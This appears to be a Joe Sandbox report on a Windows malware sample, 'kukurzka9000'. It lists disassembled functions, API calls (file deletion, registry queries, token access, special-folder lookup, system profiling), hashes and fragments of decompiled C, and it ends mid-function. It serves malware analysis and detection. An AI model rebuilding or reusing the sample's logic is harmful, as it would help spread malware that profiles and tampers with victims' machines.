Instruction Fuzzy Hash: C5419431504110AFEB099F66EE85E6E37B5EF44320F104839FD15FB2A0DB78A921DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 022B6787 Relevance: 10.6, APIs: 7, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B6830
DeleteFileW.KERNEL32(00000000), ref: 022B68FE
LocalFree.KERNEL32(00000000), ref: 022B6909
LocalFree.KERNEL32(00000000), ref: 022B6914
LocalFree.KERNEL32(00000000), ref: 022B6920
DeleteFileW.KERNEL32(00000000), ref: 022B6927
LocalFree.KERNEL32(00000000), ref: 022B692E

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
Instruction ID: 06a00f8aee720a7f6ee8b6f151f59c77d0a9192694d01cf6f97af164f5ff9f57
Opcode Fuzzy Hash: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
Instruction Fuzzy Hash: B041D231610111EFDB1A9FA2EE44EAD3BB9EF49360F104838F915E72A4DB74A910CF19

Uniqueness

Uniqueness Score: -1.00%

Function 022B7A09 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 134stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 022B7A97
LocalFree.KERNEL32(00000000), ref: 022B7B6D
CloseHandle.KERNEL32(00000000), ref: 022B7B7B
LocalFree.KERNEL32(00000000), ref: 022B7B82

Strings

s, xrefs: 022B7ABA
/, xrefs: 022B7A6D

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseHandlelstrlen
String ID: /$s
API String ID: 3009051031-4105443823
Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction ID: 07c25ebaf69e4a1af0e456f196a5c5e1933fa0778b2e8eac30ab0a60d2684cae
Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction Fuzzy Hash: 8F41DC72910116BEEB159FA5CD45FBAF3B8EF84344F008528F601A71D0EBB0AA54CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B8843 Relevance: 9.1, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,022B8FE8,00000000,00000000,00000000,00000000,00000000), ref: 022B8939

Part of subcall function 022B9A36: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 022B9A65

wsprintfW.USER32 ref: 022B8957

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,022B8FE8,00000000), ref: 022B896F
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,022B8FE8,00000000), ref: 022B8976
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,022B8FE8,00000000,00000000,00000000,00000000,00000000), ref: 022B8985
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,022B8FE8,00000000,00000000,00000000,00000000,00000000), ref: 022B898F

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$ByteCharGlobalInfoMultiSystemWidewsprintf
String ID:
API String ID: 2924325140-0
Opcode ID: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction ID: c887e7dde7adfeb67f4462e758f72807b584a865802eb64f83078bba8367c37a
Opcode Fuzzy Hash: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction Fuzzy Hash: F84192B1A002159FDB04CFA9DDC49AABBF8EF0C350B048579EE09E7355DA74AD44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004090DC Relevance: 9.1, APIs: 6, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000104,?,?,?,00409A62,00000000), ref: 0040913F
RegCloseKey.ADVAPI32(00000000,?,?,?,00409A62,00000000), ref: 00409148
LocalFree.KERNEL32(00000000,?,?,?,00409A62,00000000), ref: 0040915B
wsprintfW.USER32 ref: 0040916D

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,00000000), ref: 00409185
LocalFree.KERNEL32(00000000), ref: 0040918C

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$lstrlen$CloseGlobalQueryValuewsprintf
String ID:
API String ID: 3289414791-0
Opcode ID: 5e8d92e3f70d5fe38f1763d2356ae79cd52bc82e3d2d85c46ec5827371f6db32
Instruction ID: e9f177af51a582558b006cd38ce564a6bd3d86c6e4fd3138e243791f8522013c
Opcode Fuzzy Hash: 5e8d92e3f70d5fe38f1763d2356ae79cd52bc82e3d2d85c46ec5827371f6db32
Instruction Fuzzy Hash: 8E119372600110BBE7049BA7ED49E5BBFBCEB49350B104839F609F61A1D6B45D20CB79

Uniqueness

Uniqueness Score: -1.00%

Function 022B8650 Relevance: 9.1, APIs: 6, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000104,?,?,?,022B8FD6,00000000), ref: 022B86B3
RegCloseKey.ADVAPI32(00000000,?,?,?,022B8FD6,00000000), ref: 022B86BC
LocalFree.KERNEL32(00000000,?,?,?,022B8FD6,00000000), ref: 022B86CF
wsprintfW.USER32 ref: 022B86E1

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000,00000000), ref: 022B86F9
LocalFree.KERNEL32(00000000), ref: 022B8700

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$CloseGlobalQueryValuewsprintf
String ID:
API String ID: 923078377-0
Opcode ID: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
Instruction ID: 15202a3ad74347d1a5ba381a58f70f7170bac0edcfa838bee66b773bb1ccfad3
Opcode Fuzzy Hash: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
Instruction Fuzzy Hash: 74115172210110BBE7149BA6ED49EABBBBCEF49754F104838F649E2160DBB15920CB79

Uniqueness

Uniqueness Score: -1.00%

Function 022B555F Relevance: 9.0, APIs: 7, Instructions: 274COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000), ref: 022B5795

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000), ref: 022B579F
LocalFree.KERNEL32(00000000,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B57E4
LocalFree.KERNEL32(?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B583B
LocalFree.KERNEL32(00000000,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B5842
LocalFree.KERNEL32(00000000,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B5899
LocalFree.KERNEL32(?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B58A3

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$Global
String ID:
API String ID: 67877634-0
Opcode ID: 154df15a1167a433e68271407e97ec1704788d52295b520c09530d825bd9e518
Instruction ID: e29934bba6ab1e51ff8308a40e567a1ccdae3b5dbba1647e5f48af8d6a335811
Opcode Fuzzy Hash: 154df15a1167a433e68271407e97ec1704788d52295b520c09530d825bd9e518
Instruction Fuzzy Hash: E6A1CF71514301AFDB15DFA5CD809ABBBF5FF88340F404928FA55AB260D771D860CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0BE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0040A0D6
OpenProcessToken.ADVAPI32(00000000,?,iqroq5112542785672901323), ref: 0040A0DD
GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 0040A102
GlobalFree.KERNEL32(00000000), ref: 0040A15F

Strings

iqroq5112542785672901323, xrefs: 0040A0CB

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Process$CurrentErrorFreeGlobalLastOpenToken
String ID: iqroq5112542785672901323
API String ID: 88979007-2937663778
Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction ID: 15eb1b3bc6c873a00f883c6e6f8e066a9c9a871e93fd9db043f72c5c5a2fc382
Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction Fuzzy Hash: 51118135900215FBDB119BE6DE44EAFBBB8EB48750F040475E900F61A0DB74DE24DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403F9D(void* __ecx, intOrPtr __edx, char _a4, char _a8) {
				void* _t7;
				void* _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;

				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228, _t26, _t30, _t16, __ecx);
				_t7 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228);
				_t28 = _t7;
				 *0x40e0c4(0, _t17, 0x1c, 0);
				 *0x40e0c4(0, _t28, 0x1a, 0);
				_t1 =  &_a8; // 0x407b38
				E00401B05(_t17,  *_t1, __edx, _a4, 0);
				_t3 =  &_a8; // 0x407b38
				E0040196E(_t28,  *_t3, __edx, _a4, 0);
				if(_t17 != 0) {
					LocalFree(_t17);
				}
				if(_t28 != 0) {
					LocalFree(_t28);
				}
				return 1;
			}

0x00403fbe
0x00403fc3
0x00403fcc
0x00403fce
0x00403fdb
0x00403fe1
0x00403fec
0x00403ff1
0x00403fff
0x00404009
0x0040400c
0x0040400c
0x00404014
0x00404017
0x00404017
0x00404026

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00407B38,00000000,00000000), ref: 00403FCE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,?,00407B38,00000000,00000000), ref: 00403FDB
LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 0040400C
LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 00404017

Strings

8{@, xrefs: 00403FE1, 00403FF1

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FolderFreeLocalPathSpecial
String ID: 8{@
API String ID: 1111715986-1865321623
Opcode ID: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction ID: 72fdba0f78f482ba83b50744195af73f567e22cf42767fcd2574695d6fb78c79
Opcode Fuzzy Hash: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction Fuzzy Hash: 600128713402047BF7205F929D4AF6B3768DBC5B11F044138FB18BB2D1DAB49C1086AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABD8 Relevance: 7.7, APIs: 6, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0040ABD8(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				short _v32;
				short _v36;
				short _v38;
				char _v40;
				short _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				intOrPtr _v76;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v116;
				void* _v120;
				short* _v144;
				WCHAR* _v148;
				char _v160;
				intOrPtr _v164;
				void* _t44;
				intOrPtr _t47;
				signed int _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t54;
				char _t55;
				intOrPtr _t57;
				intOrPtr* _t69;
				void* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t87;
				intOrPtr _t94;
				void* _t98;
				intOrPtr _t102;
				void* _t105;
				intOrPtr _t107;
				void* _t110;
				intOrPtr* _t111;
				void* _t112;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int _t120;
				void* _t123;

				_v44 = 0;
				_v24 = __edx;
				_v20 = __ecx;
				_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000, _t105, _t112, _t77);
				_t44 = E0040AE06(0, _t78,  &_v52, __ecx, 0, 0, __edx, 0);
				_t123 = (_t120 & 0xfffffff8) - 0x2c + 0x14;
				if(_t44 >= 0) {
					_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
					_v48 = _t107;
					_t47 =  *((intOrPtr*)( *0x40e144))(0x208, _t107);
					_v64 = _t47;
					if(_t47 == 0) {
						L10:
						if(_v68 > 0) {
							_t51 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t98 = 0x10;
							_t53 = E0040A05F(_t51, _t98);
							_v60 = _t53;
							_t54 =  *((intOrPtr*)( *0x40e13c))(_t52,  *0x40e210);
							_t110 = _v68;
							_t55 = E0040A503(_t54, _t110);
							_t87 =  *0x40e204; // 0x6e78d8
							_v80 = _t55;
							_v88 = _t87;
							_v84 = 0;
							_t57 = E00408619( &_v80);
							_v76 = _t57;
							_t118 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, 0, 0, 0, 0);
							if(0 != 0) {
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, _t118, 0, 0, 0);
								if(0 != 0) {
									E00407EDB(_v144, _t118, 0, 0, _v164, _t78, _v148,  &_v160);
								}
							}
							LocalFree(_t118);
							LocalFree(_v116);
							LocalFree(_v120);
							LocalFree(_t110);
						}
						_t115 = 1;
						L16:
						LocalFree(_t78);
						_t49 = _t115;
						L17:
						return _t49;
					}
					_t119 = 0;
					if(_t47 == 0) {
						goto L10;
					}
					_t94 = _v56;
					_t111 = _t107 + 0xfffffffc;
					_t102 = _v64;
					_t69 = _t94 - 6;
					_v52 = _t69;
					do {
						if(_t119 <= 0) {
							goto L9;
						}
						_t102 = _v64;
						if( *((intOrPtr*)(_t94 + _t119 * 2)) != 0) {
							goto L9;
						}
						_v40 =  *_t69;
						_v38 =  *_t111;
						_v36 = 0;
						_v32 = 0;
						_t74 = E0040AE06( &_v40, _t78,  &_v68, _v44,  &_v40, _t73, _v48, 0);
						_t123 = _t123 + 0x14;
						if(_t74 < 0) {
							_t115 = _t119 | 0xffffffff;
							goto L16;
						}
						_t119 = _t119 + 1;
						_t94 = _v56;
						_t69 = _v52 + 2;
						_t102 = _v64;
						_t111 = _t111 + 2;
						L9:
						_t119 = _t119 + 3;
						_t69 = _t69 + 6;
						_t111 = _t111 + 6;
						_v52 = _t69;
					} while (_t119 < _t102);
					goto L10;
				}
				_t49 = LocalFree(_t78) | 0xffffffff;
				goto L17;
			}

APIs

LocalFree.KERNEL32(00000000), ref: 0040AC20

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: cb3fde234ea3763666557004fa5848a319dd513b55e0471afea34829c7d77506
Instruction ID: 0df1316ab9a5c1427916cb56fbbb1f674cf856c690d2ecf6bb3ed985b7a3ed22
Opcode Fuzzy Hash: cb3fde234ea3763666557004fa5848a319dd513b55e0471afea34829c7d77506
Instruction Fuzzy Hash: AF517EB1604311AFE304DB26DD44A2B76E9EBC8714F004A2EF959E72D0DA749D118BAB

Uniqueness

Uniqueness Score: -1.00%

Function 022BA14C Relevance: 7.7, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022BA194

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
Instruction ID: 7e54b64a86e0f29b9dbbd37c0244e07358a3befe0fb293a8972cbf03e43b1ef9
Opcode Fuzzy Hash: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
Instruction Fuzzy Hash: FB51BBB1A14301AFE305DF69CD44E7B76E9EFC8754F004A29F969E7290EA70DD008B66

Uniqueness

Uniqueness Score: -1.00%

Function 022B9632 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 022B964A
GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 022B9676
GlobalFree.KERNEL32(00000000), ref: 022B96D3

Strings

iqroq5112542785672901323, xrefs: 022B963F

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CurrentErrorFreeGlobalLastProcess
String ID: iqroq5112542785672901323
API String ID: 775681509-2937663778
Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction ID: e71cad3fa76c2f5a2884749fffc4437ef1378f1f17fb1fb53cbc1caa21ec929a
Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction Fuzzy Hash: 69117F35910116BBDB129BEADE44FEE7BB8EF48390F000464EA10E2160DB70DA64DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00403760 Relevance: 6.2, APIs: 4, Instructions: 200fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039CB

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

DeleteFileW.KERNEL32(?), ref: 004039AA
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 004039BA
LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039C1

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: 0273935b1b11092318b069b65173c2f6a9546147bbdeeea3bf04ef57adf8446e
Instruction ID: 855b80ec5d303092bec4e067a8265e7fa441cfeb4fa3f9afbe0cd358cb9c57d7
Opcode Fuzzy Hash: 0273935b1b11092318b069b65173c2f6a9546147bbdeeea3bf04ef57adf8446e
Instruction Fuzzy Hash: EF718D71500210EFDB059FA6EE84A5E3BB9FB48310B104979F925F72E0DB74DA208B5A

Uniqueness

Uniqueness Score: -1.00%

Function 022B2CD4 Relevance: 6.2, APIs: 4, Instructions: 200fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,00000000), ref: 022B2F3F

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

DeleteFileW.KERNEL32(?), ref: 022B2F1E
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 022B2F2E
LocalFree.KERNEL32(?,?,?,?,00000000), ref: 022B2F35

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
Instruction ID: 9445bb9a262aac3ad4c0638b55667cafbb3d248e62cd20bc0e25bd77bdcc08cf
Opcode Fuzzy Hash: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
Instruction Fuzzy Hash: 6B718D31510211EFDB029FA6EE44AAD3BB5FF48350B104A34F925E72B0DB749A20CF59

Uniqueness

Uniqueness Score: -1.00%

Function 022B0EE2 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 022B0F84
LocalFree.KERNEL32(00000000), ref: 022B0FA4
FindClose.KERNEL32(00000000), ref: 022B0FC2
PathCombineW.SHLWAPI(00000000,?,?), ref: 022B1018

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CombinePath$CloseFindFreeLocal
String ID:
API String ID: 2199340046-0
Opcode ID: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
Instruction ID: 791021f6d5f33ce24133542edfd6229b1ee8e2cfe2ee655ed6fa1ab4ea4e9fa8
Opcode Fuzzy Hash: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
Instruction Fuzzy Hash: 75412671620215ABCB269B91CD88FEB7378EF45340F0009A8FA15A3190EF749B55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 022B1079 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 022B111D
LocalFree.KERNEL32(00000000), ref: 022B1181
FindClose.KERNEL32(00000000), ref: 022B11EE

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseCombineFindFreeLocalPath
String ID:
API String ID: 2857355001-0
Opcode ID: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
Instruction ID: 00e62f443acd3a030175831a7a67186c90d8531fb6d1dd32b4aeb7cb208db7c3
Opcode Fuzzy Hash: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
Instruction Fuzzy Hash: B4415471520228ABCB269FA1DD94FEB3378EF85300F000864FE09A3164EB709A65CF64

Uniqueness

Uniqueness Score: -1.00%

Function 022B3511 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 022B3542
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 022B354F
LocalFree.KERNEL32(00000000), ref: 022B3580
LocalFree.KERNEL32(00000000), ref: 022B358B

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FolderFreeLocalPathSpecial
String ID:
API String ID: 1111715986-0
Opcode ID: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
Instruction ID: ea3534ed1ee4bc62e67e1bc371e1e5525ed56c01de1d275160d032a3adcb2b6c
Opcode Fuzzy Hash: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
Instruction Fuzzy Hash: C101F5713502147BE7205B92AD4AFAB3769DFC9B60F140128FB18AB2C0DAB0991086A9

Uniqueness

Uniqueness Score: -1.00%

Function 022B85D8 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,022B8FC4,00000000), ref: 022B8610
wsprintfW.USER32 ref: 022B8621

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7092), ref: 022B8639
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7092), ref: 022B8640

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$DefaultGlobalUserwsprintf
String ID:
API String ID: 3020363445-0
Opcode ID: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
Instruction ID: 83dfa4baab5fdddd3388dd810f82621eb8a6ea3a203a780694a518acfe37cdac
Opcode Fuzzy Hash: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
Instruction Fuzzy Hash: 22F068B1240214AFF3049BA6AD89E6677ACEB48764F044435F749B7290CAB56C608A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2AA Relevance: 5.1, APIs: 4, Instructions: 117
memoryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A2AA(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t25;
				void* _t29;
				void* _t30;
				void* _t39;
				void* _t47;
				void* _t52;
				intOrPtr _t54;
				void* _t70;
				void* _t77;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				signed int _t85;

				_t25 =  *0x40e1b8; // 0x6e7bf8
				_v12 = _t25;
				_v20 = __edx;
				_v16 = __ecx;
				_t29 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(__ecx) * 2);
				_t54 = _v16;
				_t52 = _t29;
				_t30 = 2;
				_t76 =  ==  ? _t30 : 0;
				_t77 = ( ==  ? _t30 : 0) + _t54;
				if(_t77 != 0) {
					do {
						_t39 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(_t54) * 2);
						_v8 = _t39;
